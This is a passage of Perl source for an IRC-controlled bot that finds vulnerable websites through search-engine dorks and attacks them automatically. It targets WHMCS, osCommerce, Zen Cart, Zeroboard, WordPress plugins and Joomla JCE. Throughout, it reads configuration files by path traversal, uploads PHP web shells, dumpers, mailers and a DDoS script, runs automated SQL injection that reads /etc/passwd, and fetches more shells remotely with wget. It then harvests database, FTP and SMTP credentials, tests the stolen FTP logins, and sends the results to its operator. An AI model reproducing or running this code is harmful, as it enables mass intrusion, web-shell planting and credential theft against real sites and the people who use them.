							&msg("$chan","$thumblogo15$engine 4<9=4>9 HASIL COLI KANG 4<9=4>9 ".$crut."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						}
						&get_content($botc);sleep(1);
						&get_content($botpc);sleep(1);
					}
				}
			} exit; }
    	if ($count == $num-1) { &msg("$chan","$thumblogo15$engine 9Finished Gan..."); }
    	}
    }
}

sub whmcs_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @list = search_engine($chan,$dork,$engine,$whmcslogo);
	my $num = scalar(@list);
	if ($num > 0) {
        foreach my $site (@list) {
            $count++;
            if ($count == $num-1) { &msg("$chan","$whmcslogo15$engine 9Finished Gan..."); }
            my $test = "http://".$site.$bug."../../../configuration.php%00";
            my $vuln = "http://".$site."12".$bug."6../../../configuration.php%00";
            my $html = get_content($test);
            if ($html =~ m/\$db_host = "(.+?)";.*\$db_username = "(.+?)";.*\$db_password = "(.+?)";.*\$db_name = "(.+?)";.*\$cc_encryption_hash = "(.+?)";.*\$templates_compiledir/sg) {
                my ($db_host,$db_name,$db_user,$db_pass,$enc_key) = ($1,$4,$2,$3,$5);
		&msg("$chan","$whmcslogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
               	&msg("$nick","$whmcslogo(7@2$engine15)15(13@12WHMCS15)4 ".$vuln." 15(7@3$db_host:$db_name:$db_user:$db_pass:$enc_key15)");
		&msg("$admin","$whmcslogo(7@2$engine15)15(13@12WHMCS15)4 ".$vuln." 15(7@3$db_host:$db_name:$db_user:$db_pass:$enc_key15)");
                if ($site =~ /(.+?)\//) { $site = $1; }
                if ($db_user =~ /(.+?)_/) { $db_user = $1; }
                my $validftp = ftp_login_chk($chan,$site,"21",$db_user,$db_pass);
                if ($validftp == 1) { msg("$admin","$ftplogo7 $site:21 12-6 ".$db_user.":".$db_pass." 12->3 SUCCESS!"); }
            }
        }
    }
}
    
sub ftp_login_chk {
    my $chan = $_[0];
    my $host = $_[1];
    my $port = $_[2];
    my $user = $_[3];
    my $pass = $_[4];
    my $status = 0;
    my $ftpsock = Net::FTP->new($host, Port=>$port, Debug=>0, Timeout=>10) || return $status = 2;
    $status = 1 if $ftpsock->login("$user","$pass") || return $status;
    $ftpsock->quit;
    return $status;
}

sub dbi_connect () {
	my $host = $_[0];
	my $user = $_[1];
	my $pass = $_[2];
	my $dtbs = $_[3];
	my $chan = $_[4];
	my $engine = $_[5];
	my $port = "3306";
	my $platform = "mysql";
	my $dsn = "dbi:$platform:$dtbs:$host:$port";
	my $DBIconnect=  DBI->connect($dsn,$user,$pass);
		if ($DBIconnect) {
		&msg("$chan","$whmcslogo15$engine 4<9=4>9 MySql 15[ 9http://".$host." 15] [4 Connected 15]");
	}
}

sub getUserPass() {
	my $string = $_[0];
	my @lol = split("\r\n", $string);
	my $pass = "";
	my $user = "";
	foreach my $line (@lol) {
		if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
			$pass = $3;
		}
		if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
			$user = $3;
		}
	}
	return $user.":IAMWASHERE:".$pass;
}

sub getinfo() {
	my $string = $_[0];
	my @lol = split("\r\n", $string);
	my $pass = "";
	my $user = "";
	my $dbs = "";
	foreach my $line (@lol) {
		if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
			$pass = $3;
		}
		if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
			$user = $3;
		}
		if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
			$dbs = $3;
		}
	}
	return $user.":IAMWASHERE:".$pass.":IAMWASHERE:".$dbs;
}

sub zero_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo);
    my $num = scalar(@totexploit);
    if ($num > 0){
    	foreach my $site(@totexploit){
    	$count++;
    	if ($count == $num-1) { &msg("$chan","$zerologo15$engine 9Finished Gan..."); }
				my $coba = "http://".$site.$bug;
				if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
				my $cek = &get_content($coba);sleep(1);
				if ($cek =~ /Zeroboard/) { system("./zbc $coba 80");sleep(1);
				my $vulner1 = "http://".$site.$action."?cmd=";
				my $vulner2 = "http://".$site.$action.$wgetdon;
				my $vulner3 = "http://".$site.$action.$lwpdon;
				my $vulner4 = "http://".$site.$action.$curldon;
				my $vuln1 = "http://".$site."/data/bad.php";
				my $check2 = &get_content($vulner1);
				if ($check2 =~ /coreunix/) {
					if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); }
					if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); }
					if ($zerocurl == 1) { my $coba3 = &get_content($vulner4);sleep(2); }
					my $check1 = &get_content($vuln1);
					if ($check1 =~ /coreunix/i) {
						my $safe = ""; my $os = ""; my $uid = "";
						if ($check1 =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
						if ($check1 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
						if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
						&msg("$chan","$zerologo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$admin","$zerologo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$nick","$zerologo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						} else {
						#&msg("$chan","$zerologo15$engine 4<9=4>9 Cek dewe 15 $vulner1 ");
						} sleep(2);
					}
				}
			} exit; }
		}
	}
}

sub osco_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$oscologo15$engine 9Finished Gan..."); }
			my $cat = "http://".$site."admin/categories.php/login.php";
			my $fm = "http://".$site."admin/file_manager.php/login.php";
			my $bm = "http://".$site."admin/banner_manager.php/login.php";
			my $iam = "http://".$site."images/coreunix.php";
			my $shell = "http://".$site."images/sem.php";
			my $dumper = "http://".$site."images/dumper.php";
			my $mail = "http://".$site."images/mailer.php";
				my $coba = &get_content($cat);
				my $cob2 = &get_content($fm);
				my $cob3 = &get_content($bm);
				if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
				if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
					my $test = $cat."?action=download&filename=/includes/configure.php";
					my $cek = &get_content($test);
					if ($cek =~ /http:\/\//) {
					&osql_xpl($test,$chan,$site,$engine);
					}
					my $aplod = LWP::UserAgent->new;
					my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./sem.jpg' => 'sem.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
					my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./dumper.jpg' => 'dumper.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
					my $resz = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./cgi.jpg' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resz->as_string;
					my $reszz = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./ddos.jpg' => 'ddos.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $reszz->as_string;
					my $cekap = &get_content($shell);
					if ($cekap =~ /sEm - eXploit/) {
						my $safe = ""; my $os = ""; my $uid = "";
						if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
						if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
						if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
						&msg("$chan","$oscologo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$nick","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$admin","$shell and $dumper and $mail ");sleep(1);
					} &get_content($iam."?anonymous");
				}
				if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
					my $test2 = $fm."?action=download&filename=/includes/configure.php";
					my $cek2 = &get_content($test2);
					if ($cek2 =~ /http:\/\//) {
					&osql_xpl($test2,$chan,$site,$engine);
					}
					my $aplod2 = LWP::UserAgent->new;
					my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./sem.jpg' => 'sem.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
					my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./dumper.jpg' => 'dumper.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
					my $resb2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./cgi.jpg' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb2->as_string;
					my $resbb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./ddos.jpg' => 'ddos.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resbb->as_string;
					my $cekap = &get_content($shell);
					if ($cekap =~ /sEm - eXploit/) {
						my $safe = ""; my $os = ""; my $uid = "";
						if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
						if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
						if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
						&msg("$chan","$oscologo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$nick","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$admin","$shell and $dumper and $mail ");sleep(1);
					} &get_content($iam."?anonymous");
				}
				if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
					my $test3 = $bm."?action=download&filename=/includes/configure.php";
					my $cek3 = &get_content($test3);
					if ($cek3 =~ /http:\/\//) {
					&osql_xpl($test3,$chan,$site,$engine);
					}
					my $aplod3 = LWP::UserAgent->new;
					my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./sem.jpg' => 'sem.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
					my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./dumper.jpg' => 'dumper.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
					my $resc2 = $aplod3->post($bm."?action=insert",['banners_image' => ['./cgi.jpg' => 'mailer.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc2->as_string;
					my $rescc = $aplod3->post($bm."?action=insert",['banners_image' => ['./ddos.jpg' => 'ddos.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $rescc->as_string;
					my $cekap = &get_content($shell);
					if ($cekap =~ /sEm - eXploit/) {
						my $safe = ""; my $os = ""; my $uid = "";
						if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
						if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
						if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
						&msg("$chan","$oscologo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$nick","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$admin","$shell and $dumper and $mail ");sleep(1);
					} &get_content($iam."?anonymous");
				}
				} exit;
			}
		}
	}
}

sub osql_xpl() {
	my $url    = $_[0];
	my $chan   = $_[1];
	my $site   = $_[2];
	my $engine = $_[3];
	my $request = HTTP::Request->new(GET=>$url);
	my $browser = LWP::UserAgent->new();
	$browser->timeout(10);
	my $response = $browser->request($request);
	my @dbsinfo;
	if ($response->is_success) {
		my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
		my $res = $response->as_string;
		if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
			$dpath = $1;
			&msg("$chan","$ossqllogo15$engine 4<9=4>9 http://".$site." 15[+]DIR path: 4 $dpath");
		}
		if ($res =~ m/'DB_SERVER', '(.*)'/g) {
			$dbserver = $1;
			&msg("$chan","$ossqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB Server: 4 $dbserver");
		}
		if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
			$dbuser = $1;
			&msg("$chan","$ossqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB username: 4 $dbuser");
		}
		if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
			$dbpass = $1;
			&msg("$chan","$ossqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB password: 4 $dbpass");
		}
		if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
			$dbname = $1;
			&msg("$chan","$ossqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB database: 4 $dbname");
		}
		my $hosts = "http://".$site;
		if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
			$host = $2;
			&dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
			if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
			&ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
		}
	}
}

sub zen_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
	my $num = scalar(@list);
	if ($num > 0) {
        foreach my $site (@list) {
            $count++;
            if ($count == $num-1) { &msg("$chan","$zenlogo15$engine 9Finished Gan..."); }
            my $test = "http://".$site.'admin/product.php/password_forgotten.php?action=new_product_preview';
            my $html = zen_upl_query($test);
            if ($html =~ /<td class=\"messageStackSuccess\"><img src="images\/icons\/success\.gif/) {
                if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                    my $res = get_content('http://'.$site.'images/iam.php?lol');
                    if ($res =~ /coreunix/) {
                        my $safe = ""; my $os = ""; my $uid = "";
			if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
			if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
			if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
			&msg("$chan","$zenlogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
			&msg("$admin","$zenlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 http://".$site."images/12iam.php 4(SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$admin","$zenlogo15$engine 4<9=4>9 DuMpeR 4<9=4>4 http://".$site."images/13dumper.php 4(SafeMode=$safe) (OS=$os) uid=$uid ");
			&msg("$nick","$zenlogo15$engine 4<9=4>9 DuMpeR 4<9=4>4 http://".$site."images/13dumper.php 4(SafeMode=$safe) (OS=$os) uid=$uid ");
			&msg("$nick","$zenlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 http://".$site."images/12iam.php 4(SafeMode=$safe) (OS=$os) uid=$uid ");
                        my $uplbot = iam_dumper_query($test); sleep(1);
                        if ($uplbot =~ /<td class=\"messageStackSuccess\"><img src="images\/icons\/success\.gif/) {
                            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                                my $spread_cmd = "php $iam_dumper";
                                my $spread = get_content('http://'.$site.'images/dumper.php?osc='.encode_base64($spread_cmd));
                                } exit; }
                        }
                        sleep(5);
                    }
                    elsif ($res =~ /coreunix/) {
                        my $sys = $1;
                        #&msg("$chan","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$site."images/12iam.php 15(4SUDAHH3".$sys."1513JANDA15)");
                        sleep(5);
                    }
                    else {
                        #&msg("$chan","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$site."images/12iam.php");
                    }
                    sleep(2);
                } exit; } sleep(5);
            }
        }
    }
}

sub sql_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $dork = $_[2];
    my $engine = $_[3];
    my $nick = $_[4];
    my $count = 0;
    my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
    my $num = scalar(@list);
    if ($num > 0) {
        foreach my $site (@list) {
            $count++;
			if ($count == $num-1) { &msg("$chan","$sqllogo15$engine 9Finished Gan..."); }
            my $test = "http://".$site.$bug."'";
            my $vuln = "http://".$site."4".$bug;
			my $sqlsite = "http://".$site.$bug;
            my $html = &get_content($test);
			if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
            if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
                &sqlbrute($sqlsite,$chan,$engine);}
            elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
                &msg("$chan","$sqllogo 12$engine  4< 3= 4> 15MsSQL  4>>".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
            elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
                &msg("$chan","$sqllogo 12$engine  4< 3= 4> 15MsSQL  4>> ".$vuln);&sqlbrute($sqlsite,$chan,$engine);}
            elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
                &sqlbrute($sqlsite,$chan,$engine);}
            } exit; sleep(2); }
        }
    }
}

sub sqlbrute() {
			my $site=$_[0];
			my $chan  =$_[1];
			my $engine=$_[2];
			my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
	{
	$union.=','.$column;
	$inyection.=','."0x6c6f67696e70776e7a";
    if ($column == 0)
      {
		  $inyection = '';
          $union = '';
      }
    $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
    $response=get($sql);
    if($response =~ /loginpwnz/)
		{
         $column ++;
         $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
		 &msg("$chan","$sqllogo9$engine 4<9=4>15 $sql  ");
         $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
         $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
         if($response =~ /loginpwnz/)
         	{
         	$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
			&msg("$chan","$sqllogo 9$engine 4< 9= 4> 15 INFO_SCHEMA  9>> 15 $sql  ");
         	}
         $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
         $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
         if($response =~ /loginpwnz/)
         	{
         	$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
			&msg("$chan","$sqllogo 9$engine 4< 9= 4> 15 USER  9>> 15 $sql  ");
         	}
         else
         	{
         	}
	while ($loadcont < $column-1)
	   {
		$loadfile.=','.'load_file(0x2f6574632f706173737764)';
		$loadcont++;
	   }
	   $sql=$site."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
	$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
         if($response =~ /root:x:/)
         	{
			&msg("$chan","$sqllogo 9$engine 4< 9= 4> 15 LOAD FILE   9>> 15 $sql  ");
			}
         else
         	{
         	}
	          foreach $tabla(@tabele)
                {
                  chomp($tabla);
                  $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
				 $response=get($sql)or die("[-] Impossible to get tables\n");
                  if($response =~ /loginpwnz/)
                    {
                    $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
					&msg("$chan","$sqllogo 9$engine 4< 9= 4> 15 TABEL 9>> 15 $sql  ");
					&tabelka($site,$tabla,$chan,$engine);
                    }
                }
		}
	}			
}
 
sub tabelka() {
			my $site =$_[0];
			my $tabla =$_[1];
			my $chan  =$_[2];
			my $engine=$_[3];
			my $cfin.="--";
			my $cmn.= "+";
            chomp($tabla);
            foreach $columna(@kolumny)
            {
             chomp($columna);
             $sql=$site."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
             $response=get($sql)or die("[-] Impossible to get columns\n");
             if ($response =~ /loginpwnz/)
                {
				&msg("$chan","$sqllogo9$engine 4<9=4>4 <9SQL4> 9SQLi Vuln3 $site 4<Kolom4>15 $columna 4<15Tabel4>15 $tabla  ");
                }
            }
 
}

sub mmfc_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$mmfclogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$mmfclogo15$engine 9Finished Gan..."); }
			my $aplod = LWP::UserAgent->new;
			my $res = $aplod->post("http://".$site.$bug,['fileToUpload' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
			my $hasil = $res->content;
			my $vpath = "wp-content/plugins/mm-forms-community/upload/temp/";
			if ($hasil=~ /has been successfully uploaded/){
			my $filexxx = "";
			if ($hasil=~ /filename: \'(.*)php/){$filexxx = $1;}
				&msg("$chan","$mmfclogo15$engine 15 9C3o9L3i9 D3u9L3U 15http://$site ");
				my $test = "http://".$site.$vpath.$filexxx."php";
				if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
					my $cekap = &get_content($test);
					if ($cekap =~ /vito-RawckerheaD/) {
						my $safe = ""; my $os = ""; my $uid = "";
						if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
						if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
						if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
						&msg("$chan","$mmfclogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$admin","$mmfclogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$chan","$mmfclogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
					my $cupl = $test."?cmd=wget";
					my $crut = &get_content($cupl);
					if ($crut =~ /missing/i) {
					my $upload = $cupl.'%20'.$thumbshell.'%20-O%20coreunix.php';&get_content($upload);sleep(1);
					my $shell = "http://".$site.$vpath."coreunix.php";
					my $check = &get_content($shell);
					if ($check =~ /vito-RawckerheaD/i){
						my $safe = ""; my $os = ""; my $uid = "";
						if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
						if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
						if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
						&msg("$chan","$mmfclogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$admin","$mmfclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$chan","$mmfclogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
					}
					}
				}
			} exit; } }
		}
	}
}

sub avm_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$avmlogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
		foreach my $site(@totexploit){
		$count++;
		if ($count == $num-1) { &msg("$chan","$avmlogo15$engine 9Finished Gan..."); }
			my $aplod = LWP::UserAgent->new;
			my $res = $aplod->post("http://".$site.$bug,['Filedata' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
			my $hasil = $res->content;
			my $vpath = "wp-content/videoaudio/temp/";
			if ($hasil=~ /\"filename\":\"xxx.php\"/){
				&msg("$chan","$avmlogo15$engine 15 9C3o9L3i9 D3u9L3U 15http://$site ");
				my $test = "http://".$site.$vpath."xxx.php";
				if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
					my $cekap = &get_content($test);
					if ($cekap =~ /vito-RawckerheaD/) {
						my $safe = ""; my $os = ""; my $uid = "";
						if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
						if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
						if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
						&msg("$chan","$avmlogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$admin","$avmlogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$nick","$avmlogo15$engine 4<9=4>9 Simple sHeLL 4<9=4>9 $test15 (SafeMode=$safe) (OS=$os) uid=$uid ");
					my $cupl = $test."?cmd=wget";
					my $crut = &get_content($cupl);
					if ($crut =~ /missing/i) {
					my $upload = $cupl.'%20'.$thumbshell.'%20-O%20iamwashere.php';&get_content($upload);sleep(1);
					my $shell = "http://".$site.$vpath."iamwashere.php";
					my $check = &get_content($shell);
					if ($check =~ /vito-RawckerheaD/i){
						my $safe = ""; my $os = ""; my $uid = "";
						if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
						if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
						if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
						&msg("$chan","$avmlogo4TARGET1 12SEND 3TO 13$nick Selamatt Yaaa... ^_^ 4<9=4>");
						&msg("$admin","$avmlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
						&msg("$nick","$avmlogo15$engine 4<9=4>9 sHeLL 4<9=4>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
					}
					}
				}
			} exit; } }
		}
	}
}

sub jce_exploit() {
	my $chan = $_[0];
	my $bug = $_[1];
	my $dork = $_[2];
	my $engine = $_[3];
	my $nick = $_[4];
	my $count = 0;
	my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jcelogo);
	my $num = scalar(@totexploit);
	if ($num > 0){
    	foreach my $site(@totexploit){
    	$count++;
    	if ($count == $num-1) { &msg("$chan","$jcelogo15$engine 9Finished Gan..."); }
			my $crott = "http://".$site."/images/stories/peruzak.php";
			my $iam = "http://".$site."/images/stories/wp-includes/wp-mails.php";
			if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
			my $status = &jce_upload($site);
			if ($status = 1) {
			my $check = &get_content($crott."?rf"); &get_content($iam."?clone");
				if ($check =~ /ViAr - Shell/) {
				my $safe = ""; my $os = ""; my $uid = "";
				my $smtphost = ""; my $smtpuser = ""; my $smtppass = "";
				my $ftphost = ""; my $ftpuser = ""; my $ftppass = "";
				if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
				if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
				if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
				if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;}
				if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;}
				if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;}
				if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;}
				if ($check =~ m/\$ftp_host = '(.+?)';/i){$ftphost=$1;}
				if ($check =~ m/\$ftp_port = '(.+?)';/i){$ftpport=$1;}
				if ($check =~ m/\$ftp_user = '(.+?)';/i){$ftpuser=$1;}
				if ($check =~ m/\$ftp_pass = '(.+?)';/i){$ftppass=$1;}	
				&msg("$channel","$jcelogo15$engine 4<9=4>9 sHeLL 4<9=4>9 $crott15 (SafeMode=$safe) (OS=$os) uid=$uid ");
